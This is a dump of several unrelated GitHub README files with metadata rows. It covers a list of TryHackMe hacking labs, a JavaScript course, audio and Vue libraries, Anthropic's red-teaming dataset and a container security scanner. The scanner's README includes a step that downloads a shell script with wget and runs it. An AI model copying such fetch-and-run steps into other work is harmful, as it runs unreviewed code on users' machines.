* [Solr Exploiting Log4j](<https://tryhackme.com/room/solar>) - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun.
* [Spring4Shell](<https://tryhackme.com/room/spring4shell>) - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework.
* [Most Recent threats](<https://tryhackme.com/module/recent-threats>) - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Bonus Windows
* [Attacktive Directory](<https://tryhackme.com/room/attacktivedirectory>) - Learn about 99% of Corporate networks that run off of AD.
* [Retro](<https://tryhackme.com/room/retro>) - Breaking out of the retro-themed box.
* [Blue Print](<https://tryhackme.com/room/blueprint>) - Hack into this Windows machine and escalate your privileges to Administrator.
* [Anthem](<https://tryhackme.com/room/anthem>) - Exploit a Windows machine in this beginner-level challenge.
* [Relevant](<https://tryhackme.com/room/relevant>) - Penetration Testing Challenge.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Extremely Hard Rooms to do
* [Ra](<https://tryhackme.com/room/ra>) - You have found WindCorp's internal network and their Domain Controller. Pwn the network.
* [CCT2019](<https://tryhackme.com/room/cct2019>) - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet.
* [Theseus](<https://tryhackme.com/room/theseus>) - The first installment of the SuitGuy series of very hard challenges.
* [IronCorp](<https://tryhackme.com/room/ironcorp>) - Get access to Iron Corp's system.
* [Carpe Diem 1](<https://tryhackme.com/room/carpediem1>) - Recover your client's encrypted files before the ransomware timer runs out.
* [Borderlands](<https://tryhackme.com/room/borderlands>) - Compromise a perimeter host and pivot through this network.
* [Jeff](<https://tryhackme.com/room/jeff>) - Hack into Jeff's web server.
* [Year of the Owl](https://tryhackme.com/room/yearoftheowl) - Owl-themed boot to root machine.
* [Anonymous Playground](<https://tryhackme.com/room/anonymousplayground>) - Want to become part of Anonymous? They have a challenge for you.
* [EnterPrize](<https://tryhackme.com/room/enterprize>) - Enterprise-themed network to hack into.
* [Racetrack Bank](<https://tryhackme.com/room/racetrackbank>) - It's time for another heist.
* [Python Playground](<https://tryhackme.com/room/pythonplayground>) - Use python to pwn this room.
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
## Footnotes
**Inspired by** <https://skerritt.blog/free-rooms/>
### Contributors & stargazers ✨
<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->
[![All Contributors](https://img.shields.io/badge/all_contributors-2-orange.svg?style=flat-square)](#contributors-)
<!-- ALL-CONTRIBUTORS-BADGE:END -->
Special thanks to everyone who forked or starred the repository ❤️
[![Stargazers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/stars/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/stargazers)
[![Forkers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/forks/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/network/members)
Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)):
<!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section -->
<!-- prettier-ignore-start -->
<!-- markdownlint-disable -->
<table>
<tr>
<td align="center"><a href="https://brootware.github.io"><img src="https://avatars.githubusercontent.com/u/7734956?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Oaker Min</b></sub></a><br /><a href="#infra-brootware" title="Infrastructure (Hosting, Build-Tools, etc)">🚇</a> <a href="#maintenance-brootware" title="Maintenance">🚧</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Documentation">📖</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Code">💻</a></td>
<td align="center"><a href="https://lucidcode.com"><img src="https://avatars.githubusercontent.com/u/1631870?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Michael Paul Coder</b></sub></a><br /><a href="https://github.com/brootware/cyber-security-university/commits?author=IAmCoder" title="Documentation">📖</a></td>
</tr>
</table>
<!-- markdownlint-restore -->
<!-- prettier-ignore-end -->
<!-- ALL-CONTRIBUTORS-LIST:END -->
This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind are welcome!
<!--lint disable double-link-->
[↑](#contents)<!--lint enable double-link-->
| 🎓 Because Education should be free. Contributions welcome! 🕵️ | cyber-security,awesome-list,curriculum,courses,free,education,educational-project,cybersecurity,hacking,learning-by-doing | 0 | 4 | 37 | 212 | 1 | 3 | 2 |
tayfunerbilen/30-gunde-javascript | # 30 Günde Javascript
Asabeneh S. Yetayeh'in '[30 Days of JavaScript](https://github.com/Asabeneh/30-Days-Of-JavaScript)' oluşturduğu ve 30 günde javascripti öğretmeyi hedeflediği repoyu türkçeleştirmekteyim.
Ancak bu repoda türkçe versiyonu yerine, ders sonlarında olan egzersizlerin örneklerini paylaşacağım sevgili arkadaşlar <3
Ayrıca serinin videolarını da şöyle bırakalım:
* [1. Gün - Giriş](https://www.youtube.com/watch?v=8A7RWDgkXgg)
* [2. Gün - Veri Türleri](https://www.youtube.com/watch?v=pl8W3ypHmbk)
* [3. Gün - Boolean, Operatörler ve Tarih İşlemleri](https://www.youtube.com/watch?v=BVNsL2UiDXg)
* [4. Gün - Koşullar](https://www.youtube.com/watch?v=b914QqaZYb8)
* [5. Gün - Diziler](https://www.youtube.com/watch?v=OWevID6C7j0)
* [6. Gün - Döngüler](https://www.youtube.com/watch?v=B_grs48l5gA)
* [7. Gün - Fonksiyonlar](https://www.youtube.com/watch?v=fCewgC4rgWs)
* [8. Gün - Kapsam, Nesneler](https://www.youtube.com/watch?v=isASqtTf1Vs)
* [9. Gün - Higher Order Fonksiyonlar](https://www.youtube.com/watch?v=_Yg5xml3mC4)
* [10. Gün - Set, Map](https://www.youtube.com/watch?v=TwqhonAoZfQ)
* [11. Gün - Destructuring, Spread, Rest](https://www.youtube.com/watch?v=evy8I07Oim0)
* [12. Gün - Düzenli İfadeler, RegExp](https://www.youtube.com/watch?v=iDN5hmCc8s8)
* [13. Gün - Console Metodları](https://www.youtube.com/watch?v=CZPyKqSsCbc)
* [14. Gün - Hata Yönetimi](https://www.youtube.com/watch?v=hCLH_HDX6G0)
* [15. Gün - Sınıflar](https://www.youtube.com/watch?v=vuSV9yq3fgQ)
* [16. Gün - JSON](https://www.youtube.com/watch?v=BZvLCGQvbs8)
* [17. Gün - Web Storage](https://www.youtube.com/watch?v=OicvaygNn5M)
* [18. Gün - Promise, Fetch, Async/Await](https://www.youtube.com/watch?v=abyMOwipR9E)
* [19. Gün - Closure](https://www.youtube.com/watch?v=Pe3XVMooHVc)
* [20. Gün - Temiz Kod Yazmak](https://www.youtube.com/watch?v=XPa5yQIm5NM)
* [21. Gün - DOM](https://www.youtube.com/watch?v=Z7L1M9iHMi4)
* [22. Gün - DOM 2](https://www.youtube.com/watch?v=F1ehrtj2vWE)
* [23. Gün - DOM 3 - Olaylar](https://www.youtube.com/watch?v=uMJBoDAsmYs)
* [24. Gün - Element](https://www.youtube.com/watch?v=CtpoIiAqi9Y) ([Dökümantasyon](./24-Gun.md))
* [25. Gün](https://www.youtube.com/watch?v=Oa6994-dsc8) ([Dökümantasyon](./25-Gun.md))
* [26. Gün](https://www.youtube.com/watch?v=aN372PKpNYA) ([Dökümantasyon](./26-Gun.md))
| 30 Günde Javascript, orijinali "30 days of challenge" olan ve adım adım 30 günde javascript öğretmeyi hedefleyen bir deneyimdir. | javascript | 0 | 2 | 7 | 61 | 2 | 1 | 0 |
malerba118/scrollex | # Scrollex
A library to help you make beautiful scroll experiences using minimal code.
## Docs
[https://scrollex-docs.vercel.app/](https://scrollex-docs.vercel.app/)
## Demos
[https://scrollex-docs.vercel.app/examples](https://scrollex-docs.vercel.app/examples)
https://user-images.githubusercontent.com/5760059/167218020-d1ff94a8-a138-418e-9ef0-779c849a7c23.mp4
| Build beautiful scroll experiences using minimal code | null | 0 | 2 | 4 | 33 | 1 | 4 | 0 |
robbert-vdh/nih-plug | # NIH-plug
[![Automated builds](https://github.com/robbert-vdh/nih-plug/actions/workflows/build.yml/badge.svg?branch=master)](https://github.com/robbert-vdh/nih-plug/actions/workflows/build.yml?query=branch%3Amaster)
[![Tests](https://github.com/robbert-vdh/nih-plug/actions/workflows/test.yml/badge.svg?branch=master)](https://github.com/robbert-vdh/nih-plug/actions/workflows/test.yml?query=branch%3Amaster)
[![Docs](https://github.com/robbert-vdh/nih-plug/actions/workflows/docs.yml/badge.svg?branch=master)](https://nih-plug.robbertvanderhelm.nl/)
NIH-plug is an API-agnostic audio plugin framework written in Rust, as well as a
small collection of plugins. The idea is to have a stateful yet simple plugin
API that gets rid of as much unnecessary ceremony wherever possible, while also
keeping the amount of magic to minimum and making it easy to experiment with
different approaches to things. See the [current features](#current-features)
section for more information on the project's current status.
Check out the [documentation](https://nih-plug.robbertvanderhelm.nl/), or use
the [cookiecutter template](https://github.com/robbert-vdh/nih-plug-template) to
quickly get started with NIH-plug.
### Table of contents
- [Plugins](#plugins)
- [Framework](#framework)
- [Current features](#current-features)
- [Building](#building)
- [Plugin formats](#plugin-formats)
- [Example plugins](#example-plugins)
- [Licensing](#licensing)
## Plugins
Check each plugin's readme file for more details on what the plugin actually
does. You can download the development binaries for Linux, Windows and macOS
from the [automated
builds](https://github.com/robbert-vdh/nih-plug/actions/workflows/build.yml?query=branch%3Amaster)
page. Or if you're not signed in on GitHub, then you can also find the latest
nightly build
[here](https://nightly.link/robbert-vdh/nih-plug/workflows/build/master). You
may need to [disable Gatekeeper](https://disable-gatekeeper.github.io/) on macOS to be able to use
the plugins.
Scroll down for more information on the underlying plugin framework.
- [**Buffr Glitch**](plugins/buffr_glitch) is the plugin for you if you enjoy
the sound of a CD player skipping This plugin is essentially a MIDI triggered
buffer repeat plugin. When you play a note, the plugin will sample the period
corresponding to that note's frequency and use that as a single waveform
cycle. This can end up sounding like an in-tune glitch when used sparingly, or
like a weird synthesizer when used less subtly.
- [**Crisp**](plugins/crisp) adds a bright crispy top end to any low bass sound.
Inspired by Polarity's [Fake Distortion](https://youtu.be/MKfFn4L1zeg) video.
- [**Crossover**](plugins/crossover) is as boring as it sounds. It cleanly
splits the signal into two to five bands using a variety of algorithms. Those
bands are then sent to auxiliary outputs so they can be accessed and processed
individually. Meant as an alternative to Bitwig's Multiband FX devices but
with cleaner crossovers and a linear-phase option.
- [**Diopser**](plugins/diopser) is a totally original phase rotation plugin.
Useful for oomphing up kickdrums and basses, transforming synths into their
evil phase-y cousin, and making everything sound like a cheap Sci-Fi laser
beam.
- [**Loudness War Winner**](plugins/loudness_war_winner) does what it says on
the tin. Have you ever wanted to show off your dominance by winning the
loudness war? Neither have I. Dissatisfaction guaranteed.
- [**Puberty Simulator**](plugins/puberty_simulator) is that patent pending One
Weird Plugin that simulates the male voice change during puberty! If it was
not already obvious from that sentence, this plugin is a joke, but it might
actually be useful (or at least interesting) in some situations. This plugin
pitches the signal down an octave, but it also has the side effect of causing
things to sound like a cracking voice or to make them sound slightly out of
tune.
- [**Safety Limiter**](plugins/safety_limiter) is a simple tool to prevent ear
damage. As soon as there is a peak above 0 dBFS or the specified threshold,
the plugin will cut over to playing SOS in Morse code, gradually fading out
again when the input returns back to safe levels. Made for personal use during
plugin development and intense sound design sessions, but maybe you'll find it
useful too!
- [**Soft Vacuum**](plugins/soft_vacuum) is a straightforward port of
Airwindows' [Hard Vacuum](https://www.airwindows.com/hard-vacuum-vst/) plugin
with parameter smoothing and up to 16x linear-phase oversampling, because I
liked the distortion and just wished it had oversampling. All credit goes to
Chris from Airwindows. I just wanted to share this in case anyone else finds
it useful.
- [**Spectral Compressor**](plugins/spectral_compressor) can squash anything
into pink noise, apply simultaneous upwards and downwards compressor to
dynamically match the sidechain signal's spectrum and morph one sound into
another, and lots more. Have you ever wondered what a 16384 band OTT would
sound like? Neither have I.
## Framework
### Current features
- Supports both VST3 and [CLAP](https://github.com/free-audio/clap) by simply
adding the corresponding `nih_export_<api>!(Foo)` macro to your plugin's
library.
- Standalone binaries can be made by calling `nih_export_standalone(Foo)` from
your `main()` function. Standalones come with a CLI for configuration and full
JACK audio, MIDI, and transport support.
- Rich declarative parameter system without any boilerplate.
- Define parameters for your plugin by adding `FloatParam`, `IntParam`,
`BoolParam`, and `EnumParam<T>` fields to your parameter struct, assign
stable IDs to them with the `#[id = "foobar"]`, and a `#[derive(Params)]`
does all of the boring work for you.
- Parameters can have complex value distributions and the parameter objects
come with built-in smoothers and callbacks.
- Use simple enums deriving the `Enum` trait with the `EnumParam<T>` parameter
type for parameters that allow the user to choose between multiple discrete
options. That way you can use regular Rust pattern matching when working
with these values without having to do any conversions yourself.
- Store additional non-parameter state for your plugin by adding any field
that can be serialized with [Serde](https://serde.rs/) to your plugin's
`Params` object and annotating them with `#[persist = "key"]`.
- Optional support for state migrations, for handling breaking changes in
plugin parameters.
- Group your parameters into logical groups by nesting `Params` objects using
the `#[nested(group = "...")]`attribute.
- The `#[nested]` attribute also enables you to use multiple copies of the
same parameter, either as regular object fields or through arrays.
- When needed, you can also provide your own implementation for the `Params`
trait to enable compile time generated parameters and other bespoke
functionality.
- Stateful. Behaves mostly like JUCE, just without all of the boilerplate.
- Comes with a simple yet powerful way to asynchronously run background tasks
from a plugin that's both type-safe and realtime-safe.
- Does not make any assumptions on how you want to process audio, but does come
with utilities and adapters to help with common access patterns.
- Efficiently iterate over an audio buffer either per-sample per-channel,
per-block per-channel, or even per-block per-sample-per-channel with the
option to manually index the buffer or get access to a channel slice at any
time.
- Easily leverage per-channel SIMD using the SIMD adapters on the buffer and
block iterators.
- Comes with bring-your-own-FFT adapters for common (inverse) short-time
Fourier Transform operations. More to come.
- Optional sample accurate automation support for VST3 and CLAP that can be
enabled by setting the `Plugin::SAMPLE_ACCURATE_AUTOMATION` constant to
`true`.
- Optional support for compressing the human readable JSON state files using
[Zstandard](https://en.wikipedia.org/wiki/Zstd).
- Comes with adapters for popular Rust GUI frameworks as well as some basic
widgets for them that integrate with NIH-plug's parameter system. Currently
there's support for [egui](nih_plug_egui), [iced](nih_plug_iced) and
[VIZIA](nih_plug_vizia).
- A simple and safe API for state saving and restoring from the editor is
provided by the framework if you want to do your own internal preset
management.
- Full support for receiving and outputting both modern polyphonic note
expression events as well as MIDI CCs, channel pressure, and pitch bend for
CLAP and VST3.
- MIDI SysEx is also supported. Plugins can define their own structs or sum
types to wrap around those messages so they don't need to interact with raw
byte buffers in the process function.
- Support for flexible dynamic buffer configurations, including variable numbers
of input and output ports.
- First-class support several more exotic CLAP features:
- Both monophonic and polyphonic parameter modulation are supported.
- Plugins can declaratively define pages of remote controls that DAWs can bind
to hardware controllers.
- A plugin bundler accessible through the
`cargo xtask bundle <package> <build_arguments>` command that automatically
detects which plugin targets your plugin exposes and creates the correct
plugin bundles for your target operating system and architecture, with
cross-compilation support. The cargo subcommand can easily be added to [your
own project](https://github.com/robbert-vdh/nih-plug/tree/master/nih_plug_xtask)
as an alias or [globally](https://github.com/robbert-vdh/nih-plug/tree/master/cargo_nih_plug)
as a regular cargo subcommand.
- Tested on Linux and Windows, with limited testing on macOS. Windows support
has mostly been tested through Wine with
[yabridge](https://github.com/robbert-vdh/yabridge).
- See the [`Plugin`](src/plugin.rs) trait's documentation for an incomplete list
of the functionality that has currently not yet been implemented.
### Building
NIH-plug works with the latest stable Rust compiler.
After installing [Rust](https://rustup.rs/), you can compile any of the plugins
in the `plugins` directory in the following way, replacing `gain` with the name
of the plugin:
```shell
cargo xtask bundle gain --release
```
### Plugin formats
NIH-plug can currently export VST3 and
[CLAP](https://github.com/free-audio/clap) plugins. Exporting a specific plugin
format for a plugin is as simple as calling the `nih_export_<format>!(Foo);`
macro. The `cargo xtask bundle` command will detect which plugin formats your
plugin supports and create the appropriate bundles accordingly, even when cross
compiling.
### Example plugins
The best way to get an idea for what the API looks like is to look at the
examples.
- [**gain**](plugins/examples/gain) is a simple smoothed gain plugin that shows
off a couple other parts of the API, like support for storing arbitrary
serializable state.
- **gain-gui** is the same plugin as gain, but with a GUI to control the
parameter and a digital peak meter. Comes in three exciting flavors:
[egui](plugins/examples/gain_gui_egui),
[iced](plugins/examples/gain_gui_iced), and
[VIZIA](plugins/examples/gain_gui_vizia).
- [**midi_inverter**](plugins/examples/midi_inverter) takes note/MIDI events and
flips around the note, channel, expression, pressure, and CC values. This
example demonstrates how to receive and output those events.
- [**poly_mod_synth**](plugins/examples/poly_mod_synth) is a simple polyphonic
synthesizer with support for polyphonic modulation in supported CLAP hosts.
This demonstrates how polyphonic modulation can be used in NIH-plug.
- [**sine**](plugins/examples/sine) is a simple test tone generator plugin with
frequency smoothing that can also make use of MIDI input instead of generating
a static signal based on the plugin's parameters.
- [**stft**](plugins/examples/stft) shows off some of NIH-plug's other optional
higher level helper features, such as an adapter to process audio with a
short-term Fourier transform using the overlap-add method, all using the
compositional `Buffer` interfaces.
- [**sysex**](plugins/examples/sysex) is a simple example of how to send and
receive SysEx messages by defining custom message types.
## Licensing
The framework, its libraries, and the example plugins in `plugins/examples/` are
all licensed under the [ISC license](https://www.isc.org/licenses/). However,
the [VST3 bindings](https://github.com/RustAudio/vst3-sys) used by
`nih_export_vst3!()` are licensed under the GPLv3 license. This means that
unless you replace these bindings with your own bindings made from scratch, any
VST3 plugins built with NIH-plug need to be able to comply with the terms of the
GPLv3 license.
The other plugins in the `plugins/` directory may be licensed under the GPLv3
license. Check the plugin's `Cargo.toml` file for more information.
| Rust VST3 and CLAP plugin framework and plugins - because everything is better when you do it yourself | vst3,framework,plugin-framework,plugin,rust,clap,nih-plug | 0 | 30 | 59 | 2,206 | 34 | 2 | 6 |
InhiblabCore/vue-hooks-plus | <p align="center">
<a href="https://inhiblabcore.github.io/docs/hooks">
<img width="216" src="https://raw.githubusercontent.com/InhiblabCore/vue-hooks-plus/master/packages/hooks/docs/public/logo@2x.png">
</a>
</p>
<p align="center">
<a href="https://www.npmjs.com/package/vue-hooks-plus"><img src="https://img.shields.io/npm/v/vue-hooks-plus.svg" alt="npm package"></a>
<a href="https://github.com/InhiblabCore/vue-hooks-plus/actions/workflows/node-ci.yml"><img src="https://github.com/InhiblabCore/vue-hooks-plus/actions/workflows/ci.yml/badge.svg?branch=master" alt="build status"></a>
<a href="#badge"><img src="https://img.shields.io/github/languages/top/InhiblabCore/vue-hooks-plus" alt="language"></a>
<!-- <a href="https://img.badgesize.io/https:/unpkg.com/vue-hooks-plus/dist/js/index.es.js?label=gzip%20size&compression=gzip"><img src="https://img.badgesize.io/https:/unpkg.com/vue-hooks-plus/dist/js/index.es.js?label=gzip%20size&compression=gzip" alt="gzip"></a> -->
<a href="#badge"><img src="https://img.shields.io/librariesio/github/InhiblabCore/vue-hooks-plus" alt="librariesio"></a>
<a href="https://github.com/InhiblabCore/vue-hooks-plus/blob/master/LICENSE"><img src="https://img.shields.io/github/license/InhiblabCore/vue-hooks-plus" alt="LICENSE"></a>
</p>
<div align="center">
# VueHooks Plus
English | [简体中文](https://github.com/InhiblabCore/vue-hooks-plus/tree/master/README.zh-CN.md)
High performance & Simplicity Vue3 Hooks library
</div>
## ✨ Features
- 🏄🏼♂️ Easy to learn and use
- 🔋 Supports SSR
- 🛸 Contains a comprehensive collection of basic Hooks
- 🏟️ A wide range of application scenarios
- 🦾 Preferred useRequest, Powerful request middle tier
- 🎪 Interactive demo, immersive
- 🎯 Written in TypeScript with predictable static types
- 🪄 Support the on-demand load, and reduce the packing volume
- 🤺 Playground, there's ample scope for one's abilities
- 🔐 Perfect test, safe and reliable
## 📦 Install
```bash
npm i vue-hooks-plus
```
### CDN
```html
<script src="https://cdn.jsdelivr.net/npm/vue-hooks-plus/dist/js/index.iife.js"></script>
```
It will be exposed to global as `VueHooks_Plus`
## 🤹♀️ Usage
```typescript
import { useRequest } from 'vue-hooks-plus'
```
Introduced on demand
```typescript
import useRequest from 'vue-hooks-plus/es/useRequest'
```
Auto Import
<details>
<summary>Vite</summary><br>
```ts
import AutoImport from 'unplugin-auto-import/vite'
import { VueHooksPlusResolver } from '@vue-hooks-plus/resolvers'
export const AutoImportDeps = () =>
AutoImport({
imports: ['vue', 'vue-router'],
include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/],
dts: 'src/auto-imports.d.ts',
resolvers: [VueHooksPlusResolver()],
})
```
<br></details>
<details>
<summary>Webpack</summary><br>
```ts
const { VueHooksPlusResolver } = require('@vue-hooks-plus/resolvers')
module.exports = {
/* ... */
plugins: [
require('unplugin-auto-import/webpack')({
imports: ['vue', 'vue-router'],
include: [/\.[tj]sx?$/, /\.vue$/, /\.vue\?vue/, /\.md$/],
dts: 'src/auto-imports.d.ts',
resolvers: [VueHooksPlusResolver()],
}),
],
}
```
<br></details>
For other supported tools, please see [unplugin-auto-import](https://github.com/antfu/unplugin-auto-import)
### Globalization Documentations
- [English Documentations](https://inhiblabcore.github.io/docs/hooks/en)
- [中文文档](https://inhiblabcore.github.io/docs/hooks)
### Example
- [Vue Admin Novel](https://github.com/NelsonYong/vue-admin-novel)
- [Nuxt 3](https://github.com/InhiblabCore/vue-hooks-plus-example/tree/main/nuxt3)
- [Vite + Vue 3](https://github.com/InhiblabCore/vue-hooks-plus-example/tree/main/vite-vue3)
- [Webpack + Vue 3](https://github.com/InhiblabCore/vue-hooks-plus-example/tree/main/webpack-vue3)
## 🤩 Awesome
### Template
- [Ray Template](https://github.com/XiaoDaiGua-Ray/ray-template)
## 🪴 Project Activity
![Alt](https://repobeats.axiom.co/api/embed/35dbca2274542c0144993be92cc51762227543d9.svg 'Repobeats analytics image')
### Contributing
Welcome to join us! You can check out the [Contributing Guide](./CONTRIBUTING.md) to learn how to get started.
### Contributors
Thanks for all their contributions 🐝 !
<a href="https://github.com/InhiblabCore/vue-hooks-plus/graphs/contributors">
<img src="https://contrib.rocks/image?repo=InhiblabCore/vue-hooks-plus" />
</a>
## 🌸 Thanks
This project is heavily inspired by the following awesome projects.
- [ahooks](https://ahooks.js.org/)
- [@koale/useworker](https://github.com/alewin/useWorker)
## 📄 License
[MIT License](https://github.com/InhiblabCore/vue-hooks-plus/blob/master/LICENSE) © 2022-PRESENT [YongGit](https://github.com/NelsonYong)
| High performance & Simplicity 🧲 Vue 3 Hooks library | vue-hooks-plus,typescript,vue-hooks-library,hooks-library,vue3 | 62 | 11 | 128 | 901 | 6 | 4 | 1 |
SmallRuralDog/vue3-music |
# VUE3-MUSIC
基于 VUE3+TS 开发的音乐播放器,界面模仿QQ音乐mac客户端。
在线体验:[https://smallruraldog.github.io/vue3-music](https://smallruraldog.github.io/vue3-music)
将浏览器大小设置成1050*670,体验效果更好!界面是自适应的,使用[tailwindcss.com](https://www.tailwindcss.com)来实现
手机端未适配,后期会使用[Flutter](https://flutter.dev)单独开发手机客户端,使用[Electron](https://www.electronjs.org)打包桌面客户端并内置API服务
在线演示为了安全考虑,不提供API接口服务,需要准备好自己的API服务地址,并且是HTTPS的,没有HTTPS的服务,可以本地运行,首次打开时会要求设置API地址
## 本地安装
```
git clone https://github.com/SmallRuralDog/vue3-music.git
cd vue3-music
yarn
yarn run dev
```
## 网易云音乐API
需要运行API服务才能正常体验
[开发文档](https://binaryify.github.io/NeteaseCloudMusicApi)
## UI
![image-20220310123410770](ui/image-20220310123410770.png)
![image-20220310123530635](ui/image-20220310123530635.png)
![image-20220310123634367](ui/image-20220310123634367.png)
![image-20220310123722684](ui/image-20220310123722684.png)
![image-20220310123456071](ui/image-20220310123456071.png)
![image-20220310123545606](ui/image-20220310123545606.png)
![image-20220310123650090](ui/image-20220310123650090.png)
![image-20220310123738142](ui/image-20220310123738142.png)
## PS
通过此开源项目学习VUE3的强大..加油!
| VUE3+TS 开发的音乐播放器,界面模仿QQ音乐mac客户端,支持黑夜模式 | vue,music-player,vue3,typscript | 0 | 2 | 2 | 31 | 10 | 1 | 0 |
anthropics/hh-rlhf | ## Overview
This repository provides access to:
1. Human preference data about helpfulness and harmlessness from [Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback](https://arxiv.org/abs/2204.05862)
2. Human-generated red teaming data from [Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned](https://arxiv.org/abs/2209.07858).
Each of these datasets are described further below.
**Disclaimer**: The data contain content that may be offensive or upsetting. Topics include, but are not limited to, discriminatory language and discussions of abuse, violence, self-harm, exploitation, and other potentially upsetting subject matter. Please only engage with the data in accordance with your own personal risk tolerance. The data are intended for research purposes, especially research that can make models *less* harmful. The views expressed in the data do not reflect the views of Anthropic or any of its employees.
## Human preference data about helpfulness and harmlessness
The data are described in the paper: [Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback](https://arxiv.org/abs/2204.05862). If you find the data useful, please cite the paper. The data format is very simple -- each line of the jsonl files contains a pair of texts, one "chosen" and one "rejected".
For **helpfulness**, the data are grouped into train/test splits into three tranches: from our base models (context-distilled 52B language models), via rejection sampling (mostly with best-of-16 sampling) against an early preference model, and a dataset sampled during our iterated "online" process.
For **harmlessness**, the data are only collected for our base models, but otherwise formatted in the same way.
Details about the data collection process and crowdworker population can be found in the paper, specifically in Section 2 and Appendix D.
## Red teaming data
The data are described in the paper: [Red Teaming Language Models to Reduce Harms: Methods, Scaling Behaviors, and Lessons Learned](https://arxiv.org/abs/2209.07858). If you find the data useful, please cite the paper.
Details about the data and data collection procedures can be found in the Datasheet in the appendix of the paper.
Each line of the jsonl file contains a dictionary with the following fields:
- `transcript` a text transcript of a conversation between a human adversary (red team member) and an AI assistant
- `min_harmlessness_score_transcript` a real value score of the harmlessness of the AI assistant (lower is more harmful) as obtained from a preference model
- `num_params` number of parameters in the language model powering the AI assistant
- `model_type` type of model powering the AI assistant
- `rating` the red team member's rating of how successful they were at breaking the AI assistant (Likert scale, higher is more successful)
- `task_description` a short text description written by the red team member about how they tried to red team the AI assistant
- `task_description_harmlessness_score` a real value score of the harmlessness of the task description (lower is more harmful) as obtained from a preference model
- `red_team_member_id` an arbitrary identifier of the red team member. one red team member can generate multiple red team attacks
- `is_upworker` a binary indicator that is true if the red team member was from the crowd platform Upwork or false if they were from MTurk
- `tags` a list of up to 6 tags per transcript. tags are short descriptions of the red team attempts generated by crowdworkers who reviewed red team data post-hoc. tags were only provided for a random sample of 1000 red team attempts for two of four model types.
## Contact
You can submit inquiries to: redteam@anthropic.com
| Human preference data for "Training a Helpful and Harmless Assistant with Reinforcement Learning from Human Feedback" | null | 0 | 22 | 4 | 4 | 0 | 1 | 0 |
zh-lx/code-inspector | packages/code-inspector-plugin/README.md | Click the dom on the page, it will open your IDE and position the cursor to the source code location of the dom. | vue,vscode,webpack-plugin,code,devtools,inspector,react,vite-plugin | 0 | 8 | 86 | 416 | 4 | 68 | 0 |
chaitin/veinmind-tools | <p align="center">
<img src="https://dinfinite.oss-cn-beijing.aliyuncs.com/image/20220428154824.png" width="120">
</p>
<h1 align="center"> veinmind-tools </h1>
<p align="center">
<a href="https://veinmind.chaitin.com/docs/">Documentation</a>
</p>
<p align="center">
<img src="https://img.shields.io/github/v/release/chaitin/veinmind-tools.svg" />
<img src="https://img.shields.io/github/release-date/chaitin/veinmind-tools.svg?color=blue&label=update" />
<img src="https://img.shields.io/badge/go report-A+-brightgreen.svg" />
<p align="center"> veinmind-tools 是由长亭科技自研,牧云团队孵化,基于 <a href="https://github.com/chaitin/libveinmind">veinmind-sdk</a> 打造的容器安全工具集 </p>
<p align="center"> veinmind, 中文名为<b>问脉</b>,寓意 <b>容器安全见筋脉,望闻问切治病害。</b> 旨在成为云原生领域的一剂良方 </p>
</p>
<p align="center"> 中文文档 | <a href="README.en.md">English</a> </p>
## 🔥 Demo
![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/scan.gif)
问脉已接入 openai, 可以使用 openai 对扫描的结果进行人性化分析,让您更加清晰的了解本次扫描发现了哪些风险。
![](https://veinmind-cache.oss-cn-hangzhou.aliyuncs.com/img/ai.png)
## 🕹️ 快速开始
### 1. 确保机器上正确安装 docker
```
docker info
```
### 2. 安装 [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) 镜像
```
docker pull registry.veinmind.tech/veinmind/veinmind-runner:latest
```
### 3. 下载 [veinmind-runner](https://github.com/chaitin/veinmind-tools/tree/master/veinmind-runner) 平行容器启动脚本
```
wget -q https://download.veinmind.tech/scripts/veinmind-runner-parallel-container-run.sh -O run.sh && chmod +x run.sh
```
### 4. 快速扫描本地镜像/容器
```
./run.sh scan [image/container]
```
### 5. 使用 openAI 智能分析
```
./run.sh scan [image/container] --enable-analyze --openai-token <your_openai_token>
```
> 注: 使用 openAI 时,请确保当前网络能够访问openAI
> 平行容器启动时,需要手动通过 docker run -e http_proxy=xxxx -e https_proxy=xxxx 设置代理(非全局代理的场景下)
### 6. 生成 <html> <cli> <json> 报告
```
./run.sh scan [image/container] --format=html,cli
```
> 报告将在当前目录下生成一个`report.html`或`report.json`
> 可以通过`,`来传入多个报告格式,如`--format=html,cli,json`将输出三份不同的报告。
## 🔨 工具列表
| 工具 | 功能 |
|---------------------------------------------------------------------------|-------------------|
| [veinmind-runner](veinmind-runner/README.md) | 扫描工具运行宿主 |
| [veinmind-malicious](plugins/go/veinmind-malicious) | 扫描容器/镜像中的恶意文件 |
| [veinmind-weakpass](plugins/go/veinmind-weakpass) | 扫描容器/镜像中的弱口令 |
| [veinmind-log4j2](plugins/go/veinmind-log4j2) | 扫描容器/镜像中的log4j2漏洞 |
| [veinmind-minio](plugins/go/veinmind-minio) | 扫描容器/镜像中的minio漏洞 |
| [veinmind-sensitive](plugins/go/veinmind-sensitive) | 扫描镜像中的敏感信息 |
